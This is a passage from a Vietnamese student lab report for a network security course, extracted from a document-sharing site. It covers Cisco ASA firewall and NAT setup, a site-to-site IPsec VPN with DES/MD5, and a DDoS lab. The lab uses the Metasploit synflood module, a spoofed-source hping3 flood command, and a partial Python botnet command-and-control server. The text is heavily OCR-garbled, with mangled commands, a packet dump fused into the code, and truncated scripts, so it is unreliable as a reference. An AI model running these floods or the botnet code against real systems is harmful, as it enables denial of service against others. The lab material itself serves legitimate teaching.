Cấu hình định tuyến

Một phần của tài liệu BÁO cáo THỰC HÀNH môn an toàn mạng nâng cao THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN (Trang 45)

LAB 6 : CONFIG ASA BACSIC

2. Cấu hình định tuyến

thể giao tiếp được với các server vùng DMZ

3. Cấu hình FW chỉ cho phép PC với IP 192.168.2.10 được phép SSH vào FW

4. Cấu hình static NAT trên FW sao cho người dùng ngoài inetrnet chí có thể truy cập được dịch vụ Remote Desktop của server 192.168.10.10

5. Cấu hình PAT trên FW sao cho người dùng từ vùng inside có thể truy cập được các dịch vụ ngoài internet

Hình 67. Mô hình ASA

1. Cấu hình thông tin trên các cổng của FWCổng inside Cổng inside

ciscoasa(config)# interface eO ciscoasa(config-if) # nameií inside

INFO: Securitỵ level for "inside" set to 100 bỵ default. ciscoasa(config-if)# security-level 100

ciscoasa(config-if)# ip address 192.168.0.1 255.255.255.0

ciscoasa(config-if)# r

Hình 68. Thông tin cấu hình trên cổng inside Cổng DMZ

ciscoasa(config)# interface e2 ciscoasa(config-if) # nameif DMZ

INFO: Security level for "DMZ" set to 0 by default.

ciscoasa(config-if)# security-level 50

ciscoasa(config-if)# ip address 192.168.10.1 255.255.255.0

ciscoasa(config-if)# I

Hình 69. Thông tin cấu hình trên cổng DMZ Cổng outside

ciscoasa(config)# interface el ciscoasa(config-if)# nameif outside

ciscoasa(config-if)# securiity-level 0

A

ERROR: % Invalid input detected at 'A' marker.

ciscoasa(config-if)# security-level 0

ciscoasa(config-if)# ip address dhcp setroute

ciscoasa(config-if)# I

Hình 70. Thông tin cấu hình trên cổng outside 2. Cấu hình định tuyến

Cấu hình default-route trên router R2 Cấu hình static route trên FW

ciscoasa(config)# route inside 192.168.2.0 255.255.255.0 192.168.0.254

ciscoasa(coníig)# I_____________________________________________________

Hình 71. Thông tin cấu hình static route trên FW Mặc định ASA không cho phép icmp giữa các vùng, cần cấu hình thêm: ciscoasa(config)# policy-map global_policỵ

ciscoasa(config-pmap)# class inspection_default

ciscoasa(config-pmap-c)# inspect icmp

ciscoasa(config-pmap-c)# I

Hình 72. Thông tin cấu hình icmp trên FW 3. Cấu hình SSH trên FW

ciscoasa(coníig)# User waren password waren

ciscoasa(coníig)# crỵpto keỵ generate rsa general-keys INFO: The nante for the keỵs will be: <Default-RSA-Keỵ> Keỵpair generation process begin. Please wait...

ciscoasa(config)# ssh 192.168.2.10 255.255.255.255.inside

ERROR: % Invalid input detected at ’A' marker.

ciscoasa(coníig)# ssh 192.168.2.10 255.255.255.255 inside ciscoasa(coníig)# ssh version 2

ciscoasa(config)# aaa authentication ssh console LOCAL

ciscoasa(config)# I________________________________________

Sau đó ta có thể truy cập SSH từ PC 192.168.2.10

Hình 74. Kết quả SSH vào FW trên ( PC 192.168.2.10)

4. Cấu hình static NAT và ACL để cho từ bên ngoài có thể truy cập dịch vụ RemoteDesktop trên vùng DMZ Desktop trên vùng DMZ

Bước 1: Cấu hình object network:

ciscoasa(config)# object network DMZ_10.10

ciscoasa(config-network-object)# host 192.168.10.10

ciscoasa (confiq-network-ob~iect) # Ễ________________

Hình 75. Thông tin cấu hình object network Bước 2: Cấu hình object service:

ciscoasa(config-network-object)# object Service RDP

ciscoasa(config-service-object)# Service tcp source eq 3389

ciscoasa(config-service-object)# I

Hình 76. Thông tin cấu hình object service

Bước 3: Cấu hình NAT và cấu hình ACL để cho phép truy cập từ outside vào DMZ ciscoasa(config)# nat (DMZ,outside) source static DMZ_10.10 interíace Service $ ciscoasa(config)# access-list POLICY extended permit tcp any host 192.168.10.1$ ciscoasa(config)# access-group POLICY in interíace outside

ciscoasa(config)# [______________________________________________________________

Sau khi cấu hình, ta có thể truy cập dịch vụ remote desktop từ vùng outside ( cổng outside có địa chỉ: 192.168.36.151)

Hình 78. Thông tin cổng outside Etherneto manual Ethernetl DECP inside outside 192.168.0.1 255.255.255.0 192.168.36.151 255.255.255.0

® QEMU (Win) JR ITEORVN LAB FileZilla WinSCP Windows Security Iser name [ Cancel ]

Control Panel PuTTY Xshell

Enter your credentials

These credentials will be used to connect to 192.168.36.151. /3 Computer I Passvvord Domain: Eireíox Network Google Chrome Remember my credentials ITF EVKey WinRAR Xftp 3:18 PM 2/25/2022

Hình 79 kết quả remote desktop vào PC 192.168.10.10

Hình 80. Kết quả truy cập dịch vụ remote desktop từ PC ngoài vùng outside 5. Cấu hình PAT để cho phép người dùng từ inside có thể truy cập internet

ciscoasa(config)# nat (inside,outside) source dỵnamic USER interface

ciscoasa(config)# I

Hình 81. Thông tin cấu hình PAT cho phép inside truy cập internet Sau khi cấu hình xong, ta có thể truy cập internet

33 Àdministraton C:\Window5\5ystem32\cmd.exe

ỊPụ4 Address...: 192.168.2.10 Subnet Mask ... : 255.255.255.0 Delault Gateuay ... : 192.168.2.254 Ethernet adapter Npcap Loopback Adapter:

Connection— specỉíỉcDNS Suffix . :

AutoconEigurâtion IPụ4 Address. . : 169.254.81.134

Subnet Mask ... : 255.255.0.0 DePault Gateuap ... :

C:XUsersXlTFOBUN LAB>pinS 8.8.8.8 Pinging 8.8.8.8 uith 32 bptes of data:

Bepĩp ĩron 8.8.8.8: bptes-32 t irne =267rns TTL=Ỉ27 Beplý írori 8.8.8.8: býtes=32 tine=84ris TTL=Ỉ27 Beplý írori 8.8.8.8: býtes=32 tine=66ris TTL=Ỉ27 Beplý írori 8.8.8.8: býtes=32 tine=68ris TTL=Ỉ27 Pinsf statistics for 8.8.8.8:

Pachets: Sent = 4. Beceiued = 4. Lost = 0 <0Z loss). Approxỉmate round trỉp tines in ỊỊỊĨlli—seconds:

Mininun = 66ns. Maxinuri = 267ms. Auerage = 121ns C:XUsersXlTFOBUN LAB>

Hình 82. Kết quả truy cập internet từ PC (192.168.2.10) (inside)

Hình 83. Kết quả ping từ PC ( 192.168.2.10 inside) đến PC (192.168.10.10 DMZ)

Hình 84. Mô hình thực hiện cấu hình IPSEC VPN SITE TO SITE

1. Mô tả

Thực hiện cấu hình IPSec VPN giữa hai site đảm bảo mạng LAN thuộc SAIGON và VUNGTAU có thể giao tiếp đươc với nhau

2. Cấu hình

2.1 Cấu hình trên router SAIGON

Bước 1: Cấu hình chính sách IKE (chính sách pha 1)

SAIGON(config)#crypto isakmp policy 10

SAIGON(config-isakmp)#hash md5

SAIGON(config-isakmp)#encryption des

SAIGON(config-isakmp)#group 2

SAIGON(config-isakmp)#authentication pre-share

SAIGON (config-isakmp) #[]

Hình 85. Thông tin cấu hình chính sách IKE trên router SAIGON Bước 2: Xác định thông tin key và peer

SAIGON(config-isakmp)tauthentication pre-share

SAIGON(config-isakmp)#crypto isakmp keỵ warenl23 address 151.1.1.1 Hình 86. Thông tin key và peer trên router SAIGON

Bước 3: Cấu hình chính sách IPSec ( chính sách pha 2)

SAIGON(coníig)#crỵpto ipsec transform-set MYSET esp-des esp-md5-hmac SAIGON(cfg-crypto-trans)#1

Hình 87. Thông tin cấu hình chính sách IPSEC trên router SAIGON Bước 4: Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ

SAIGON(cfg-crypto-trans)#exit

SAIGON(coníig)#$ 100 permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 SaTGON írnn-ri rrì

Hình 88. Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ trên souter SAIGON Bước 5: Cấu hình crypto map

SAIGON(config)#crỵpto map MYMAP 10 ipsec-isakmp

% NOTE: This new crypto map will remain disabled until a peer and a valid access list have been configured.

SAIGON(config-crypto-map)#set peer 151.1.1.1

SAIGON (config-crypto-map) #set transform.-set MYSET SAIGON(config-crypto-map)#match address 100

SAIGON(config-crypto-map)#1

Hình 89. Cấu hình crypto map trên router SAIGON

2.2 Cấu hình trên router VUNGTAU

Bước 1: Cấu hình chính sách IKE (chính sách pha 1) VUNGTAU(config)#crỵpto isakmp policy 10 VUNGTAU(coníig-isakmp)#hasj md5

A

% Invalid input detected at 'A’ marker.

VUNGTAU(config-isakmp)#hash md5

VUNGTAU(config-isakmp)#encryption des

VUNGTAU(coníig-isakmp)#group 2

VUNGTAU(config-isakmp)#authentication pre-share

VUNGTAU (coníig-isakitip) #1______________________

Hình 90. Thông tin cấu hình chính sách IKE trên router VUNGTAU

VUNGTAU(config-isakmp)tauthentication pre-share

VUNGTAU(coníig-isakmp)#crỵpto isakmp keỵ warenl23 address 150.1.1.1

VUNGTAU(config)#1

Hình 91. Thông tin key và peer trên router VUNGTAU Bước 3: Cấu hình chính sách IPSec ( chính sách pha 2)

VUNGTAU(config)#crypto ipsec transform-set MYSET esp-des esp-md5-hmac

VUNGTAU(cfg-crypto-trans)#Ễ____________________________________________

Hình 92. Thông tin cấu hình chính sách IPSEC trên router VUNGTAU Bước 4: Xác định luồng dữ liệu sẽ được mã hóa hay bảo vệ

VƯNGTAU(config)100 permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255

VUNGTAU(config)#1

Hình 93. Xác định luồng dữu liệu được mã hóa hay bảo về trên router VUNGTAU Bước 5: Cấu hình crypto map

VUNGTAU(config)tcrỵpto map MYMAP 10 ipsec-isakmp

% NOTE: This new crypto map will remain disabled until a peer and a valid access list have been coníigured.

VUNGTAU(config-crypto-map)#set peer 150.1.1.1 VUNGTAU(config-crypto-map)#set transform-set MYSET VUNGTAU(config-crypto-map)#match address 100

VUNGTAU(config-crypto-map)

Hình 94. Thông tin cấu hình crypto map trên router VUNGTAU 3. Kiểm tra

Kích hoạt kết nối VPN dựa vào lưu lượng xác định trên acl 100 SAIGON#ping 192.168.2.1 source 192.168.1.1

Type escape sequence to abort.

Sending 5, 100-bỵte ICMP Echos to 192.168.2.1, timeout is 2 seconds:

Packet sent with a source address of 192.168.1.1 I I I I I

Success rate ỉs 100 percent (5/5), round-trip min./avg/max = 6/6/7 Itts

SAIGON#n

Sauk hi kết nối VPN được thiết lập có thể kiểm tra thông tin về pha 1 và pha 2 Trạng thái isakmp sa:

SAIGON#show crỵpto isakmp sa IPv4 Crỵpto ISAKMP SA

dst src State conn-id status

151.1.1.1 150.1.1.1 QM_IDLE 1001 ACTIVE

IPv6 Crypto ISAKMP SA

SAIGON#n_______________________________________________________

Hình 96. Trạng thái crypto isakmp sa Trạng thái ipsec sa:

IPv6 Crỵpto ISAKMP SA

SAIGON#show crypto ipsec sa intertace: Etherneto/l

Crỵpto map tag: MYMAP, local addr 150.1.1.1

protected vrf: (none)

local ident (addr/mask/prot/port): (192.168.1.0/255.255.255.0/0/0)

remote ident (addr/mask/prot/port): (192.168.2.0/255.255.255.0/0/0)

current_peer 151.1.1.1 port 500

PERMIT, flags={origin_is_acl,}

#pkts encaps: 5, #pkts encrypt: 5, #pkts digest: 5

#pkts decaps: 5, #pkts decrỵpt: 5, #pkts verifỵ: 5

#pkts compressed: 0, #pkts decompressed: 0 Hình 97. Trạng thái IPSEC sa current outbound spi: 0xE2C6079E(3804628894)

PES (Y/N): N, DH group: none

inbound esp sas:

spi: 0xBEBBFA34(3199990324)

transtorm: esp-des esp-md5-hmac ,

in use settings ={Tunnel, }

conn id: 1, flow_id: SW:1, siblingílags 80004040, crỵpto map: MYMAP

sa timing: remaining key liíetime (k/sec): (4244386/3356)

IV size: 8 bytes

replay detection support: Y

outbound esp sas:

spi: 0XE2C6079E(3804628894)

transíorm: esp-des esp-md5-hmac ,

in use settings ={Tunnel, }

conn id: 2, flow_id: SW:2, sibling_flags 80004040, crypto map: MYMAP sa timing: remaining key lifetime (k/sec): (4244386/3356)

IV size: 8 bytes

replay detection support: Y

Stãtus: ACTIVE(ACTIVE)

Số lượng kết nối được mở ( 1 IKE và 2 IPSEC)

SAIGON#show crypto engine connections active Crỵpto Engine Connections

I

D 1 IPsecType Algorithm.DES+MD5 t EncrypŨ Decrypt5 LastSeq5N AddressIP-150.1.1.

2 IPsec DES+MD5 5 0 0 150.1.1.

100 IKE MD5+DES 0 0 0 150.1.1.

Hình 98. Số lượng kết nối SAIGON#show crypto session detail

Crỵpto session current status

Code: c - IKE Configuration mode, D - Dead Peer Detection

K - Keepalives, N - NAT-traversal, T - cTCP encapsulation

X - IKE Extended Authentication, F - IKE Eragmentation

Interface: EthernetO/1 Uptime: 00:08:30

Session status: UP-ACTIVE

Peer: 151.1.1.1 port 500 fvrf: (none) ivrf: (none)

Phasel_id: 151.1.1.1

Desc: (none)

IKEvl SA: local 150.1.1.1/500 remote 151.1.1.1/500 Active

Capabilities:(none) connid:1001 lifetime:23:51:29

IPSEC FLOW: permit ip 192.168.1.0/255.255.255.0 192.168.2.0/255.255.255.0

Active SAs: 2, origin: crypto ntap

Inbound: #pkts dec'ed 5 drop 0 life (KB/Sec) 4244386/3089

Outbound: #pkts enc'ed 5 drop 0 life (KB/Sec) 4244386/3089

LAB 8 TẤN CÔNG DDOS BẰNG SYNFLOOD VÀ HPING3 1. Tấn công ddos bằng synflood

SYN flood ( half-open attack) là một kiểu tấn công từ chối dịch vụ (DDos), tấn công này với mục đích làm cho Server không có lưu lượng để truy cập hợp pháp bằng cách tiêu thụ tất cả tài nguyên server đang có sẵn. Bằng việc gửi liên tục gửi các packet tin yêu cầu kết nối ban đầu (SYN).

Hình 100. Thông tin máy nạn nhân Bước 1 : Kiểm tra port 445 của máy nạn nhân có mở không

® /home/nguyet

nmap -p 445 192.168.36.142

starting Nmap 7.92 ( https://nmap.org ) at 2022-02-26 01:53 EST

Nmap scăn report íor 192.168.36.142

Host is up (0.00063S latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

MAC Address: 00:0C:29:2F:F6:56 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds

® /home/nguyet

I

Hình 101. Trên máy tấn công kiểm tra port 445 của máy nạn nhân 109

1 auxiiiary/aos/nttp/squia_range_aosauxiliary/dos/windows/ssh/sysax_sshd_kexchange 2013-03-17 1normanormal1 N õ 1

11 auxiliary/dos/tcp/synflood normat No

Bước 2 : Tiến hành giả lập máy ảo với địa chỉ 192.168.0.1 để tấn công máy nạn nhân với địa chỉ 192.168.36.142

msf6 > use 111

msf 6 auxìlỉary( ) > show options Module options (auxiLỉary/dos/tcp/synflood):

Name Current Settỉng Requỉred Descriptỉon INTERFA

CE no The name of the interface

NUM no Number of SYNs to send (else unlimỉted)

RHOSTS yes The target host(s), see https://github.coin/rapid7/metasploit-frainework/wiki/Using-Metasploit

RPORT 80 yes The target port

SHOST no The spoofable source address (else randomizes)

SNAPLE 65535 yes The number of bytes to capture

SPORT no The source port (else randomizes)

TIMEOU T

500 yes The number of seconds to wait for new data ) > set RHOST192.168.36.142

) > set RPORT445

) > set SHOST 192.168.0.1

) > set TIMEOUT 30000

) > I

Hình 103. Dùng msfconsole để show các options Mở wireshark để xem thông tin các gói tin:

Đầu tiên, máy tấn công gửi 1 packet tin SYN đến Server để yêu cầu kết nối.

Sau khi tiếp nhận packet SYN, Server phản hồi lại máy khách bằng một packet SYN/ACK, để xác nhận thông tin từ Client.

Bước 3: Mở wireshark và theo dõi

Cuối cùng, Client nhận được packet tin SYN/ACK thì sẽ trả lời server bằng packet tin ACK báo

với server biết rằng nó đã nhận được packet tin SYN/ACK, kết nối đã được thiết lập và sẵn sàng trao đổi dữ liệu.

Hình 104. Gói tin bắt được khi tấn công Mở task manager và quan sát biểu đồ hoạt động

msf6 auxiliary( RHOST => 192.168.36.142 msf6 auxilỉaryC RPORT =a 445 msf6 auxìlỉary( SHOST =} 192.168.0.1 msf 6 auxỉlỉary( TIMEOUT => 30000 msf 6 auxìlỉary(

Hình 105. Biểu đồ hoạt động của cpu trên máy nạn nhân

2. Tấn công với hping 3

Hping3 là một ứng dụng đầu cuối dành cho Linux điều đó sẽ cho phép chúng tôi dễ dàng phân tích và lắp ráp các gói TCP / IP. Không giống như một ping thông thường được sử dụng để gửi các gói ICMP, ứng dụng này cho phép gửi các gói TCP, UDP và RAW-IP.

Hping3 -S 192.168.36.133 -a 192.168.36.142 -p 335 -flood ( với 192.168.36.133 là ip máy tấn công, 192.168.36.142 là ip máy nạn nhân )

® /home/nguyet

L- hping3 -s 192.168.367133 a 192.168.36.142 135 ttooơ HPING 192.168.36.133 (eth0 192.168.36.133): s set, 40 headers + 0 data bytes hping in ttood mode, no replies witt be shown

— 192.168.36.133 hping statistic —

33204153 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms

® /home/nguyet

L hping3 -5 192.168.367133 -a 192.168.36.142 135 —flood 1

HPING 192.168.36.133 (eth0 192.168.36.133): s set, 40 headers + 0 data bytes hping in ttood mode, no replies witt be shown

I

Hình 106. Tấn công với câu lệnh hping3 Mở task manager để xem thông tin cpu của máy nạn nhân

Hình 107. Mở taskmanager trên máy nạn nhân và theo dõi bểu đồ Mở wireshark và theo dõi gói tin

Hình 108. Mở wireshark và theo dõi gói tin 3. Tấn công ddos bằng botnet:

Botnet là một mạng lưới các máy tính được cài phần mềm để làm 1 công việc nào đó. Người ta thường nói về botnet với nghĩa xấu hơn là tốt vì botnet hay được hacker mũ đen sử dụng để tấn công một website hay một dịch vụ online nào đó

Mô hình gồm 2 máy : 1 máy attack , 1 máy victim Máy attack (linux với IP 192.168.36.155)

ethe: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet 192.168.36.155 netmask 255.255.255.0 broadcast 192.168.36.255 inet6 fe80:: 20c:29ff:fecd:e6fl preíixlen 64 scopeid 0x20<link>

ether 00:0C:29:cd:e6:f1 txqueueien 1000 (Ethernet) RX packets 1315 bytes 81897 (79.9 KiB)

RX errors 0 dropped 0 overruns 0 írame 0 TX packets 1184 bytes 66420 (64.8 KiB)

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 19 base 0x2000

Hình 109. Thông tin máy server Máy client (win 2012 với IP 192.168.36.162)

Hình 110. Thông tin máy client Bước 1: Cấu hình file server.py trên máy server

Trên máy server , ta có file sevrer.py như sau: 1346... 32.299646018 1346... 32.299654484 1346... 32.299684176 1346... 32.299692227 1346... 32.299732950 1346... 32.299741412 1346... 32.299771183 1346... 32.299779359 1346... 32.299820086 1346... 32.299828224 1346... 32.299873660 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.133 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 192.168.36.142 TCP 54 54 54 54 54 54 54 54 54 54 54 135 - 135 135 - 135 - 135 - 135 - 135 - 135 - 135 - 135 - 135 - 35797 35798 35799 35800 35801 35802 35803 35804 35805 35806 35807 [RST( [RST, [RST, [RST, [RST, [RST, [RST, [RST, [RST, [RST, [RST, ACK] ACK] ACK] ACK] ACK] ACK] ACK] ACK] ACK] ACK] ACK] Seq=ỉ Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l Seq=l

Ack=4138344294 Win=0 Len=0 Ack=733523711 win=0 Len=e Ack=885917960 Win=0 Len=0 Ack=2838853274 win=0 Len=0 Ack=3003729400 Wín=0 Len=0 Ack=672633979 win=0 Len=0 Ack=4267110922 Win=0 Ack=2775195647 Wín=0 Len=0Len=0 Ack=2930643947 win=0 Len=0 Ack=772416300 Wln=0 Len=0 Ack=218746685 win=0 Len=0

íroin threading import Thread íroin time import sleep

import ctypes, Socket, sys Smport plattorm, signal írom random import choice íroi typing import Union, Tuple

class Colours:

def ___init____(self):|

if platform.system() = ■Windows': kerne!32 = Ctypes.windlt.kernel32 kernel32.SetcónsoleMode(kernel32.GetStdHandle(-ll), 7) COMMANDS = { 'inío': (33, '[!] '), ■que': (34, '[?] ■), 'bad': (31, ’[-] '), ■good': (32, ■[+] ■), 'run': (97, ’[-] '), ■green': 32, 'ĩgreen': 92, 'lightgreen': 92, 'grey': 37, 'blaék': 30, 'red': 31, 'Ired': 91, 'lightred': 91, 'cyan': 36, 'lcyan': 96, 'lightcyan': 96, ■blue': 34, 'Iblue': 94, 'lightblue': 94, 'purple': 35, ■ỹeliow': 93, 'white': 97, 'Ipurple': 95, 'lightpurple': 95, 'orange': 33, ’bg': 'i7', 'bold': ■, 'italic': '3', 'under': '4',

'under':' 4' , 'strike': '09',

}

for key, vai in COMMANDS.ỉtems():

value = val[0] if ỉsỉnstance(val, tuple) else val preíix = val[l] if isỉnstance(val, tuple) else '•

locals()[key] = lambda s, preíix=prefix, key=value: _gen(s, preíix, key)

self._____dỉct___[key] = lambda s, preíix=prefỉx, key=value: self._gen(s, prefix, key)

deí _gen(self,strỉng, preíix, key):

colored = preíix if preíix else strỉng not_colored = strỉng if preíix (ìlse ''

result = '\033[{}m{}\033[0m{}'.format(key, colored, not_colored)

return result

class Server(Colours):

co=["green","Igreen","lightgreen","grey","red","Ired","lightred","cyan","lcyan","lightcyan","blue","Iblue",

deí ____init____(self, connect:Tuple[str,ỉnt]=("0.0.0.0",9999)):

super()._____inỉt____() sỉgnal.sỉgnal(sỉgnal.SIGINT, selí.exỉt_gracefully) sỉgnal.signal(sỉgnal.SIGTERM, selí.exỉt_gracefully) selí.prỉnt_logo() self.all_connectỉons = [] self.all_address = [] selí.stop = if self._bỉnd(connect): while True: self._take_cmd()

def exit_gracefully(self,sỉgnum:Unỉon[str,object]="n, frame:Unỉon[str,object]=""):

prỉnt("\nExiting....")

selí.stop =

selí.sock.close()

sleep(1) sys.exỉt(0)

def _bind(self, connect:Tuple[str,ỉnt]) -» bool:

selí.sóck = Socket.socket(socket.AF_INET, Socket.SOCK_STREAM) selí.sock.bỉnd(connect)

elií cmd = "update":

self.check(display- ,always= )

elif cmd in ['exit',"quit"]:

self. exit_graceful.Xy( )

elif "attack" in cmd:

íor 1, (ip, port) in enumerate(self.all_address):

Một phần của tài liệu BÁO cáo THỰC HÀNH môn an toàn mạng nâng cao THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN (Trang 45)

Tải bản đầy đủ (DOCX)

(69 trang)
w